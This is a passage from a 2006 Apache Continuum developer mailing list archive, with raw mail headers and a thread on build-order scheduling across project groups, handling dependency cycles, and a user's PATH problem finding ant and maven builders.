take all projects from all groups, sort them >> 17:15 <evenisse> if we don't have a cycle, it's ok and we build all >> 17:15 <evenisse> if it isn't ok, we sort project by group >> >> For example, if we loaded up a Plexus group and a Maven group...the >> way it currently is (with my change) it would process all triggered >> builds within one group and then process all triggered builds in the >> other group. This would not take into account potential dependencies >> between the two. >> >> Does anyone have any thoughts on this? I am inclined to fix it up so >> its like it used to be where all projects across all project groups >> are thrown into the graph....I keep feeling like I am missing >> something wrong with this, but I can't pin it down. >> >> One thing that perhaps Emmanuel could explain a bit more is the third >> comment there. In our conversation on this he said that he thinks >> that the cycles are cropping up all the time, and if thats the case >> then we are building a lot of unordered builds which would account for >> some of the strange reports we have been getting. Are you saying that >> if we detect the cycle we default back to the way I am doing it now? >> order within the groups... >> >> jesse >> >> >> >> >> > From [email protected] Wed Nov 08 09:15:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27660 invoked from network); 8 Nov 2006 09:15:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 09:15:17 -0000 Received: (qmail 47869 invoked by uid 500); 8 Nov 2006 09:15:27 -0000 Delivered-To: [email protected] Received: (qmail 47843 invoked by uid 500); 8 Nov 2006 09:15:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47832 invoked by uid 99); 8 Nov 2006 09:15:27 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 01:15:27 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 08 Nov 2006 01:15:12 -0800 Received: (qmail 23628 invoked from network); 8 Nov 2006 09:14:51 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 8 Nov 2006 09:14:51 -0000 Message-ID: <[email protected]> Date: Wed, 08 Nov 2006 10:14:42 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: build scheduling issues References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Yes, we need a global ordering, so projects will be build independently of groups, because in some case a cycle can be created between groups (not necessary between projects). In case a cycle is detected between projects, continuum can't find the build order. In this case, I think we need to sort a little project so will reduce build errors. So if we have a cycle, we can sort projects in a group and build them. In most of case (maven projects), we don't have a cycle in a group. Emmanuel Brett Porter a écrit : > I think you want global ordering. Grouping should just be a > display/management technique, not anything that changes how projects are > handled. > > However, this needs to be reviewed as a whole (which I think Emmanuel is > doing), such that builds can be triggered when their dependencies change > which will help with the ordering as it won't be dependant on them all > being triggered at the same time? > > - Brett > > On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: > >> I was reading through the DefaultContinuum.buildProjects( Schedule id >> ) method and after discussing some things with Emmanuel...I think we >> have a problem here. When I went through and refactored things to >> support a more Project Group centric setup with continuum I changed >> this method a bit. >> >> Originally, this method would gather up all projects that would be >> triggered by that schedule, run them all through the project sorter >> and then build each in sequence. >> >> When I added the project groups to this mix, I changed things to be on >> a project group basis, so that on a project group by project group >> basis it would order the projects and build them. At the time I >> thought this was the way to go...but maybe not. >> >> 17:14 <evenisse> we need to take all projects from all groups, sort them >> 17:15 <evenisse> if we don't have a cycle, it's ok and we build all >> 17:15 <evenisse> if it isn't ok, we sort project by group >> >> For example, if we loaded up a Plexus group and a Maven group...the >> way it currently is (with my change) it would process all triggered >> builds within one group and then process all triggered builds in the >> other group. This would not take into account potential dependencies >> between the two. >> >> Does anyone have any thoughts on this? I am inclined to fix it up so >> its like it used to be where all projects across all project groups >> are thrown into the graph....I keep feeling like I am missing >> something wrong with this, but I can't pin it down. >> >> One thing that perhaps Emmanuel could explain a bit more is the third >> comment there. In our conversation on this he said that he thinks >> that the cycles are cropping up all the time, and if thats the case >> then we are building a lot of unordered builds which would account for >> some of the strange reports we have been getting. Are you saying that >> if we detect the cycle we default back to the way I am doing it now? >> order within the groups... >> >> jesse >> >> >> >> >> >> --jesse mcconnell >> [email protected] > > > From [email protected] Wed Nov 08 11:57:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67799 invoked from network); 8 Nov 2006 11:57:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 11:57:21 -0000 Received: (qmail 81788 invoked by uid 500); 8 Nov 2006 11:57:32 -0000 Delivered-To: [email protected] Received: (qmail 81771 invoked by uid 500); 8 Nov 2006 11:57:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81760 invoked by uid 99); 8 Nov 2006 11:57:32 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 03:57:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 03:57:18 -0800 Received: by nf-out-0910.google.com with SMTP id l24so452174nfc for <[email protected]>; Wed, 08 Nov 2006 03:56:56 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=KKuKefAPE/9/rRaDZ5qf0lBwbnXnEGlfK9JD6DZ+Uugj//9LdWKQ6DLOhcKCK15C+PEddXG3FNnqhhEHEo+oEl4O56ufdk9H4uXmn7wKKGwz6pI2/GZDc2CR42m9ie6RXF1Ve0Yl5azbycChi6Xo3+KLszJwQ8Q6uty086Yaces= Received: by 161.129.204.104 with SMTP id y5mr1696759buc.1162987016347; Wed, 08 Nov 2006 03:56:56 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 8 Nov 2006 03:56:56 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 8 Nov 2006 05:56:56 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: build scheduling issues In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: base64 Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org d2Ugc2hvdWxkIGFkZCBhIHBhZ2UgdGhhdCBhbmFseXplcyBlYWNoIHNjaGVkdWxlIGZvciBjeWNs ZXMuLi50aGF0CndvdWxkIGJlIGEgY29vbCBsaXR0bGUgZmVhdHVyZQoKT24gMTEvOC8wNiwgRW1t YW51ZWwgVmVuaXNzZSA8ZW1tYW51ZWxAdmVuaXNzZS5uZXQ+IHdyb3RlOgo+IFllcywgd2UgbmVl ZCBhIGdsb2JhbCBvcmRlcmluZywgc28gcHJvamVjdHMgd2lsbCBiZSBidWlsZCBpbmRlcGVuZGVu dGx5IG9mIGdyb3VwcywgYmVjYXVzZSBpbiBzb21lCj4gY2FzZSBhIGN5Y2xlIGNhbiBiZSBjcmVh dGVkIGJldHdlZW4gZ3JvdXBzIChub3QgbmVjZXNzYXJ5IGJldHdlZW4gcHJvamVjdHMpLgo+Cj4g SW4gY2FzZSBhIGN5Y2xlIGlzIGRldGVjdGVkIGJldHdlZW4gcHJvamVjdHMsIGNvbnRpbnV1bSBj YW4ndCBmaW5kIHRoZSBidWlsZCBvcmRlci4gSW4gdGhpcyBjYXNlLCBJCj4gdGhpbmsgd2UgbmVl ZCB0byBzb3J0IGEgbGl0dGxlIHByb2plY3Qgc28gd2lsbCByZWR1Y2UgYnVpbGQgZXJyb3JzLiBT byBpZiB3ZSBoYXZlIGEgY3ljbGUsIHdlIGNhbgo+IHNvcnQgcHJvamVjdHMgaW4gYSBncm91cCBh bmQgYnVpbGQgdGhlbS4gSW4gbW9zdCBvZiBjYXNlIChtYXZlbiBwcm9qZWN0cyksIHdlIGRvbid0 IGhhdmUgYSBjeWNsZSBpbgo+IGEgZ3JvdXAuCj4KPiBFbW1hbnVlbAo+Cj4gQnJldHQgUG9ydGVy IGEgw6ljcml0IDoKPiA+IEkgdGhpbmsgeW91IHdhbnQgZ2xvYmFsIG9yZGVyaW5nLiBHcm91cGlu ZyBzaG91bGQganVzdCBiZSBhCj4gPiBkaXNwbGF5L21hbmFnZW1lbnQgdGVjaG5pcXVlLCBub3Qg YW55dGhpbmcgdGhhdCBjaGFuZ2VzIGhvdyBwcm9qZWN0cyBhcmUKPiA+IGhhbmRsZWQuCj4gPgo+ ID4gSG93ZXZlciwgdGhpcyBuZWVkcyB0byBiZSByZXZpZXdlZCBhcyBhIHdob2xlICh3aGljaCBJ IHRoaW5rIEVtbWFudWVsIGlzCj4gPiBkb2luZyksIHN1Y2ggdGhhdCBidWlsZHMgY2FuIGJlIHRy aWdnZXJlZCB3aGVuIHRoZWlyIGRlcGVuZGVuY2llcyBjaGFuZ2UKPiA+IHdoaWNoIHdpbGwgaGVs cCB3aXRoIHRoZSBvcmRlcmluZyBhcyBpdCB3b24ndCBiZSBkZXBlbmRhbnQgb24gdGhlbSBhbGwK PiA+IGJlaW5nIHRyaWdnZXJlZCBhdCB0aGUgc2FtZSB0aW1lPwo+ID4KPiA+IC0gQnJldHQKPiA+ Cj4gPiBPbiAwOC8xMS8yMDA2LCBhdCA5OjUxIEFNLCBKZXNzZSBNY0Nvbm5lbGwgd3JvdGU6Cj4g Pgo+ID4+IEkgd2FzIHJlYWRpbmcgdGhyb3VnaCB0aGUgRGVmYXVsdENvbnRpbnV1bS5idWlsZFBy b2plY3RzKCBTY2hlZHVsZSBpZAo+ID4+ICkgbWV0aG9kIGFuZCBhZnRlciBkaXNjdXNzaW5nIHNv bWUgdGhpbmdzIHdpdGggRW1tYW51ZWwuLi5JIHRoaW5rIHdlCj4gPj4gaGF2ZSBhIHByb2JsZW0g aGVyZS4gIFdoZW4gSSB3ZW50IHRocm91Z2ggYW5kIHJlZmFjdG9yZWQgdGhpbmdzIHRvCj4gPj4g c3VwcG9ydCBhIG1vcmUgUHJvamVjdCBHcm91cCBjZW50cmljIHNldHVwIHdpdGggY29udGludXVt IEkgY2hhbmdlZAo+ID4+IHRoaXMgbWV0aG9kIGEgYml0Lgo+ID4+Cj4gPj4gT3JpZ2luYWxseSwg dGhpcyBtZXRob2Qgd291bGQgZ2F0aGVyIHVwIGFsbCBwcm9qZWN0cyB0aGF0IHdvdWxkIGJlCj4g Pj4gdHJpZ2dlcmVkIGJ5IHRoYXQgc2NoZWR1bGUsIHJ1biB0aGVtIGFsbCB0aHJvdWdoIHRoZSBw cm9qZWN0IHNvcnRlcgo+ID4+IGFuZCB0aGVuIGJ1aWxkIGVhY2ggaW4gc2VxdWVuY2UuCj4gPj4K PiA+PiBXaGVuIEkgYWRkZWQgdGhlIHByb2plY3QgZ3JvdXBzIHRvIHRoaXMgbWl4LCBJIGNoYW5n ZWQgdGhpbmdzIHRvIGJlIG9uCj4gPj4gYSBwcm9qZWN0IGdyb3VwIGJhc2lzLCBzbyB0aGF0IG9u IGEgcHJvamVjdCBncm91cCBieSBwcm9qZWN0IGdyb3VwCj4gPj4gYmFzaXMgaXQgd291bGQgb3Jk ZXIgdGhlIHByb2plY3RzIGFuZCBidWlsZCB0aGVtLiAgQXQgdGhlIHRpbWUgSQo+ID4+IHRob3Vn aHQgdGhpcyB3YXMgdGhlIHdheSB0byBnby4uLmJ1dCBtYXliZSBub3QuCj4gPj4KPiA+PiAxNzox NCA8ZXZlbmlzc2U+IHdlIG5lZWQgdG8gdGFrZSBhbGwgcHJvamVjdHMgZnJvbSBhbGwgZ3JvdXBz LCBzb3J0IHRoZW0KPiA+PiAxNzoxNSA8ZXZlbmlzc2U+IGlmIHdlIGRvbid0IGhhdmUgYSBjeWNs ZSwgaXQncyBvayBhbmQgd2UgYnVpbGQgYWxsCj4gPj4gMTc6MTUgPGV2ZW5pc3NlPiBpZiBpdCBp c24ndCBvaywgd2Ugc29ydCBwcm9qZWN0IGJ5IGdyb3VwCj4gPj4KPiA+PiBGb3IgZXhhbXBsZSwg aWYgd2UgbG9hZGVkIHVwIGEgUGxleHVzIGdyb3VwIGFuZCBhIE1hdmVuIGdyb3VwLi4udGhlCj4g Pj4gd2F5IGl0IGN1cnJlbnRseSBpcyAod2l0aCBteSBjaGFuZ2UpIGl0IHdvdWxkIHByb2Nlc3Mg YWxsIHRyaWdnZXJlZAo+ID4+IGJ1aWxkcyB3aXRoaW4gb25lIGdyb3VwIGFuZCB0aGVuIHByb2Nl c3MgYWxsIHRyaWdnZXJlZCBidWlsZHMgaW4gdGhlCj4gPj4gb3RoZXIgZ3JvdXAuICAgVGhpcyB3 b3VsZCBub3QgdGFrZSBpbnRvIGFjY291bnQgcG90ZW50aWFsIGRlcGVuZGVuY2llcwo+ID4+IGJl dHdlZW4gdGhlIHR3by4KPiA+Pgo+ID4+IERvZXMgYW55b25lIGhhdmUgYW55IHRob3VnaHRzIG9u IHRoaXM/ICBJIGFtIGluY2xpbmVkIHRvIGZpeCBpdCB1cCBzbwo+ID4+IGl0cyBsaWtlIGl0IHVz ZWQgdG8gYmUgd2hlcmUgYWxsIHByb2plY3RzIGFjcm9zcyBhbGwgcHJvamVjdCBncm91cHMKPiA+ PiBhcmUgdGhyb3duIGludG8gdGhlIGdyYXBoLi4uLkkga2VlcCBmZWVsaW5nIGxpa2UgSSBhbSBt aXNzaW5nCj4gPj4gc29tZXRoaW5nIHdyb25nIHdpdGggdGhpcywgYnV0IEkgY2FuJ3QgcGluIGl0 IGRvd24uCj4gPj4KPiA+PiBPbmUgdGhpbmcgdGhhdCBwZXJoYXBzIEVtbWFudWVsIGNvdWxkIGV4 cGxhaW4gYSBiaXQgbW9yZSBpcyB0aGUgdGhpcmQKPiA+PiBjb21tZW50IHRoZXJlLiAgSW4gb3Vy IGNvbnZlcnNhdGlvbiBvbiB0aGlzIGhlIHNhaWQgdGhhdCBoZSB0aGlua3MKPiA+PiB0aGF0IHRo ZSBjeWNsZXMgYXJlIGNyb3BwaW5nIHVwIGFsbCB0aGUgdGltZSwgYW5kIGlmIHRoYXRzIHRoZSBj YXNlCj4gPj4gdGhlbiB3ZSBhcmUgYnVpbGRpbmcgYSBsb3Qgb2YgdW5vcmRlcmVkIGJ1aWxkcyB3 aGljaCB3b3VsZCBhY2NvdW50IGZvcgo+ID4+IHNvbWUgb2YgdGhlIHN0cmFuZ2UgcmVwb3J0cyB3 ZSBoYXZlIGJlZW4gZ2V0dGluZy4gIEFyZSB5b3Ugc2F5aW5nIHRoYXQKPiA+PiBpZiB3ZSBkZXRl Y3QgdGhlIGN5Y2xlIHdlIGRlZmF1bHQgYmFjayB0byB0aGUgd2F5IEkgYW0gZG9pbmcgaXQgbm93 Pwo+ID4+IG9yZGVyIHdpdGhpbiB0aGUgZ3JvdXBzLi4uCj4gPj4KPiA+PiBqZXNzZQo+ID4+Cj4g Pj4KPiA+Pgo+ID4+Cj4gPj4KPiA+PiAtLWplc3NlIG1jY29ubmVsbAo+ID4+IGplc3NlLm1jY29u bmVsbEBnbWFpbC5jb20KPiA+Cj4gPgo+ID4KPgo+CgoKLS0gCmplc3NlIG1jY29ubmVsbApqZXNz ZS5tY2Nvbm5lbGxAZ21haWwuY29tCg== From [email protected] Wed Nov 08 12:47:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78766 invoked from network); 8 Nov 2006 12:47:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 12:47:23 -0000 Received: (qmail 80064 invoked by uid 500); 8 Nov 2006 12:47:23 -0000 Delivered-To: [email protected] Received: (qmail 80017 invoked by uid 500); 8 Nov 2006 12:47:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79960 invoked by uid 99); 8 Nov 2006 12:47:23 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 04:47:23 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 08 Nov 2006 04:47:08 -0800 Received: (qmail 17829 invoked from network); 8 Nov 2006 12:46:50 -0000 Received: from unknown (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 8 Nov 2006 12:46:50 -0000 Message-ID: <[email protected]> Date: Wed, 08 Nov 2006 13:46:14 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: build scheduling issues References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Yes Jesse McConnell a écrit : > we should add a page that analyzes each schedule for cycles...that > would be a cool little feature > > On 11/8/06, Emmanuel Venisse <[email protected]> wrote: >> Yes, we need a global ordering, so projects will be build >> independently of groups, because in some >> case a cycle can be created between groups (not necessary between >> projects). >> >> In case a cycle is detected between projects, continuum can't find the >> build order. In this case, I >> think we need to sort a little project so will reduce build errors. So >> if we have a cycle, we can >> sort projects in a group and build them. In most of case (maven >> projects), we don't have a cycle in >> a group. >> >> Emmanuel >> >> Brett Porter a écrit : >> > I think you want global ordering. Grouping should just be a >> > display/management technique, not anything that changes how projects >> are >> > handled. >> > >> > However, this needs to be reviewed as a whole (which I think >> Emmanuel is >> > doing), such that builds can be triggered when their dependencies >> change >> > which will help with the ordering as it won't be dependant on them all >> > being triggered at the same time? >> > >> > - Brett >> > >> > On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: >> > >> >> I was reading through the DefaultContinuum.buildProjects( Schedule id >> >> ) method and after discussing some things with Emmanuel...I think we >> >> have a problem here. When I went through and refactored things to >> >> support a more Project Group centric setup with continuum I changed >> >> this method a bit. >> >> >> >> Originally, this method would gather up all projects that would be >> >> triggered by that schedule, run them all through the project sorter >> >> and then build each in sequence. >> >> >> >> When I added the project groups to this mix, I changed things to be on >> >> a project group basis, so that on a project group by project group >> >> basis it would order the projects and build them. At the time I >> >> thought this was the way to go...but maybe not. >> >> >> >> 17:14 <evenisse> we need to take all projects from all groups, sort >> them >> >> 17:15 <evenisse> if we don't have a cycle, it's ok and we build all >> >> 17:15 <evenisse> if it isn't ok, we sort project by group >> >> >> >> For example, if we loaded up a Plexus group and a Maven group...the >> >> way it currently is (with my change) it would process all triggered >> >> builds within one group and then process all triggered builds in the >> >> other group. This would not take into account potential dependencies >> >> between the two. >> >> >> >> Does anyone have any thoughts on this? I am inclined to fix it up so >> >> its like it used to be where all projects across all project groups >> >> are thrown into the graph....I keep feeling like I am missing >> >> something wrong with this, but I can't pin it down. >> >> >> >> One thing that perhaps Emmanuel could explain a bit more is the third >> >> comment there. In our conversation on this he said that he thinks >> >> that the cycles are cropping up all the time, and if thats the case >> >> then we are building a lot of unordered builds which would account for >> >> some of the strange reports we have been getting. Are you saying that >> >> if we detect the cycle we default back to the way I am doing it now? >> >> order within the groups... >> >> >> >> jesse >> >> >> >> >> >> >> >> >> >> >> >> --jesse mcconnell >> >> [email protected] >> > >> > >> > >> >> > > From [email protected] Wed Nov 08 12:53:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81692 invoked from network); 8 Nov 2006 12:53:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 12:53:09 -0000 Received: (qmail 93701 invoked by uid 500); 8 Nov 2006 12:53:20 -0000 Delivered-To: [email protected] Received: (qmail 93683 invoked by uid 500); 8 Nov 2006 12:53:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93672 invoked by uid 99); 8 Nov 2006 12:53:19 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 04:53:19 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony12.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 04:53:06 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by customer-domains.icp-qv1-irony12.iinet.net.au with ESMTP; 08 Nov 2006 20:52:43 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAADJiUUXLniZSdGdsb2JhbAANjD0B X-IronPort-AV: i="4.09,401,1157299200"; d="scan'208"; a="20196307:sNHT21656187" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Brett Porter <[email protected]> Subject: Re: build scheduling issues Date: Wed, 8 Nov 2006 23:52:41 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Sorry, am I missing something? How do we end up with a cycle in =20 Continuum? Is there a specific example? I know it's possible - we had to allow it in the repository (eg, =20 dom4j <-> jaxen), but it is certainly undesirable and honestly should =20= be rare, especially in m2 built artifacts. Should it produce a build =20 warning? Basically, the treatment there is to just stop following the tree =20 when you hit the cycle, rather than changing the way things are =20 ordered. So it's really arbitrary which might come first, but isn't =20 really a concern there. Anyway, just wondering. Cheers, Brett On 08/11/2006, at 11:46 PM, Emmanuel Venisse wrote: > Yes > > Jesse McConnell a =E9crit : >> we should add a page that analyzes each schedule for cycles...that >> would be a cool little feature >> On 11/8/06, Emmanuel Venisse <[email protected]> wrote: >>> Yes, we need a global ordering, so projects will be build =20 >>> independently of groups, because in some >>> case a cycle can be created between groups (not necessary between =20= >>> projects). >>> >>> In case a cycle is detected between projects, continuum can't =20 >>> find the build order. In this case, I >>> think we need to sort a little project so will reduce build =20 >>> errors. So if we have a cycle, we can >>> sort projects in a group and build them. In most of case (maven =20 >>> projects), we don't have a cycle in >>> a group. >>> >>> Emmanuel >>> >>> Brett Porter a =E9crit : >>> > I think you want global ordering. Grouping should just be a >>> > display/management technique, not anything that changes how =20 >>> projects are >>> > handled. >>> > >>> > However, this needs to be reviewed as a whole (which I think =20 >>> Emmanuel is >>> > doing), such that builds can be triggered when their =20 >>> dependencies change >>> > which will help with the ordering as it won't be dependant on =20 >>> them all >>> > being triggered at the same time? >>> > >>> > - Brett >>> > >>> > On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: >>> > >>> >> I was reading through the DefaultContinuum.buildProjects=20 >>> ( Schedule id >>> >> ) method and after discussing some things with Emmanuel...I =20 >>> think we >>> >> have a problem here. When I went through and refactored =20 >>> things to >>> >> support a more Project Group centric setup with continuum I =20 >>> changed >>> >> this method a bit. >>> >> >>> >> Originally, this method would gather up all projects that =20 >>> would be >>> >> triggered by that schedule, run them all through the project =20 >>> sorter >>> >> and then build each in sequence. >>> >> >>> >> When I added the project groups to this mix, I changed things =20 >>> to be on >>> >> a project group basis, so that on a project group by project =20 >>> group >>> >> basis it would order the projects and build them. At the time I >>> >> thought this was the way to go...but maybe not. >>> >> >>> >> 17:14 <evenisse> we need to take all projects from all groups, =20= >>> sort them >>> >> 17:15 <evenisse> if we don't have a cycle, it's ok and we =20 >>> build all >>> >> 17:15 <evenisse> if it isn't ok, we sort project by group >>> >> >>> >> For example, if we loaded up a Plexus group and a Maven =20 >>> group...the >>> >> way it currently is (with my change) it would process all =20 >>> triggered >>> >> builds within one group and then process all triggered builds =20 >>> in the >>> >> other group. This would not take into account potential =20 >>> dependencies >>> >> between the two. >>> >> >>> >> Does anyone have any thoughts on this? I am inclined to fix =20 >>> it up so >>> >> its like it used to be where all projects across all project =20 >>> groups >>> >> are thrown into the graph....I keep feeling like I am missing >>> >> something wrong with this, but I can't pin it down. >>> >> >>> >> One thing that perhaps Emmanuel could explain a bit more is =20 >>> the third >>> >> comment there. In our conversation on this he said that he =20 >>> thinks >>> >> that the cycles are cropping up all the time, and if thats the =20= >>> case >>> >> then we are building a lot of unordered builds which would =20 >>> account for >>> >> some of the strange reports we have been getting. Are you =20 >>> saying that >>> >> if we detect the cycle we default back to the way I am doing =20 >>> it now? >>> >> order within the groups... >>> >> >>> >> jesse >>> >> >>> >> >>> >> >>> >> >>> >> >>> >> --jesse mcconnell >>> >> [email protected] >>> > >>> > >>> > >>> >>> From [email protected] Wed Nov 08 13:16:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88772 invoked from network); 8 Nov 2006 13:16:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 13:16:06 -0000 Received: (qmail 32592 invoked by uid 500); 8 Nov 2006 13:16:17 -0000 Delivered-To: [email protected] Received: (qmail 32572 invoked by uid 500); 8 Nov 2006 13:16:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32561 invoked by uid 99); 8 Nov 2006 13:16:16 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 05:16:16 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO chandler.sharp.fm) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Nov 2006 05:16:02 -0800 Received: from chandler.sharp.fm (localhost [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id 3AB10E5CCA for <[email protected]>; Wed, 8 Nov 2006 07:15:40 -0600 (CST) Received: from www.sharp.fm (unknown [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id 20C4CE44F9 for <[email protected]>; Wed, 8 Nov 2006 07:15:39 -0600 (CST) Received: from 161.129.204.104 (SquirrelMail authenticated user [email protected]) by www.sharp.fm with HTTP; Wed, 8 Nov 2006 15:15:40 +0200 (SAST) Message-ID: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> Date: Wed, 8 Nov 2006 15:15:40 +0200 (SAST) Subject: Empty path in Continuum trunk From: "Graham Leggett" <[email protected]> To: [email protected] User-Agent: SquirrelMail/1.4.8-2.el4 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Hi all, Sent this by mistake to the maven list, sorry :( I have set up a recent version of trunk (v1.1) as a WAR file under tomcat, and have been able to crank it up and add some projects. Continuum cannot find it's builders though, claiming that they are not in the path "". The builders are in the PATH of the environment when tomcat is being cranked up. Is there anything special that needs to be done before continuum can see maven and ant on a Linux machine? The errors are: 2006-11-08 13:32:17,319 [main] WARN ContinuumBuildExecutor:ant - Could not find the executable 'ant' in the path '[]'. 2006-11-08 13:32:17,324 [main] WARN ContinuumBuildExecutor:maven-1 - Could not find the executable 'maven' in the path '[]'. 2006-11-08 13:32:17,613 [main] WARN ContinuumBuildExecutor:maven2 - Could not find the executable 'mvn' in the path '[]'. Regards, Graham -- From [email protected] Wed Nov 08 14:57:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25175 invoked from network); 8 Nov 2006 14:57:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Nov 2006 14:57:54 -0000 Received: (qmail 16562 invoked by uid 500); 8 Nov 2006 14:58:05 